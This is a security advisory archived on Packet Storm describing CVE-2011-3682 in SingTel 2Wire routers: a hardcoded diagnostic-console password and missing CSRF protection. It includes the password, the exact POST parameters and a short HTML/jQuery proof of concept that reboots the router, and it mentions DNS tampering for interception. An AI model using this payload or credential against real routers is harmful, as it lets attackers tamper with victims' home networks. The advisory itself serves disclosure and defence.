what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Singtel 2Wire Hardcoded Password / Cross Site Request Forgery

Singtel 2Wire Hardcoded Password / Cross Site Request Forgery
Posted Nov 1, 2011
Authored by Tan Sze Chuen

The Singtel 2Wire gateway router comes shipped with a hardcoded password that cannot be changed and suffers from a lack of cross site request forgery protection.

tags | exploit, csrf
advisories | CVE-2011-3682
SHA-256 | eb5b5217e2b643bfb0ab1be7a52fe6d7c9ec87512e821b9d6da3c54b7ae5e770

Singtel 2Wire Hardcoded Password / Cross Site Request Forgery

Change Mirror Download
CVE-2011-3682: 2WIRE-SINGTEL 2701HGV-E/2700HGV-2/2700HG GATEWAY ROUTER MANAGEMENT AND DIAGNOSTIC CONSOLE VULNERABILITY 


1. BACKGROUND AND AFFECTED MODELS/FIRMWARE

SingTel provides customized versions of 2Wire gateway routers to its Internet service subscribers for the purpose of accessing the web.

Customized firmware at major version 5 (or below) contains a Management and Diagnostic Console (MDC) at http://192.168.1.254/mdc (when accessing from a device connected to the router) for SingTel engineers to perform setup and debugging procedures.

While the vulnerability is known to be patched in major version 6 (and above) of the firmware, it is likely that a high number of SingTel Internet service customers are still on the outdated firmware as there is no firmware upgrade procedure available to these subscribers.

2. VULNERABILITY

The MDC has its default password set as “2wire”. As opposed to the user panel at http://192.168.1.254, this password cannot be changed.

Although the site is only accessible through devices on the local subnet of the router, when combined with the lack of Cross-Site Request Forgery (CSRF) protection, the vulnerability allows attackers to alter the router’s settings for malicious purposes.

3. EXPLOIT

The exploit can be delivered through a HTML page served to the victim. Then, the maliciously crafted page can instruct the victim’s browser to send a POST request, meant to execute changes in the MDC, via XMLHttpRequest or a populated and automatically submitted form in JavaScript.

For instance, in the proof-of-concept, which reboots the router when served to a client connected to a vulnerable router, a form is POST to http://192.168.1.254/xslt with the following parameters:

PAGE = S01_POST,
view = XML,
THISPAGE = J21,
NEXTPAGE = J21_REBOOT,
PASSWORD = 2wire

4. IMPACTS AND ADVISORY

A successful attack is unlikely to be noticed by the end-user with the lack of warning that comes with a CSRF attack, especially when performed through XMLHttpRequest. A likely exploitation would involve the alteration of the victim router’s Domain Name System (DNS) records, enabling a Man-in-the-Middle (MITM) attack vector. This allows for severe Advanced Persistent Threats (APT) to the victim.

Hence, it is advised for SingTel and 2Wire to push the updated firmware to its subscribers as soon as possible.

While the issue is pending resolution, SingTel Internet service customers with firmware major version 5 (and below) are advised to:

- Avoid visiting any website that is not previously trusted, especially web search results and links on social networking sites
- Pay increased attention to any anomalies in Internet service, such as substantial increase in page-load durations

5. DISCLOSURE AND NOTES

Attempt has been made to contact SingTel about the vulnerability through SingCERT on 14 September 2011. While confirmation of vulnerability has been received, no plan to fix the vulnerability has been made known before the 31 October 2011 deadline specified.


TAN SZE CHUEN
Security Researcher
tan@szechuen.com (PGP key available)


Updates and Proof-of-Concept at http://blog.szechuen.com/cve-2011-3682

Proof-of-Concept:


<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
</head>
<body>
<script>
$.post("http://192.168.1.254/xslt", { PAGE: "S01_POST", view: "XML", THISPAGE: "J21", NEXTPAGE: "J21_REBOOT", PASSWORD: "2wire" } );
</script>
</body>
</html>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close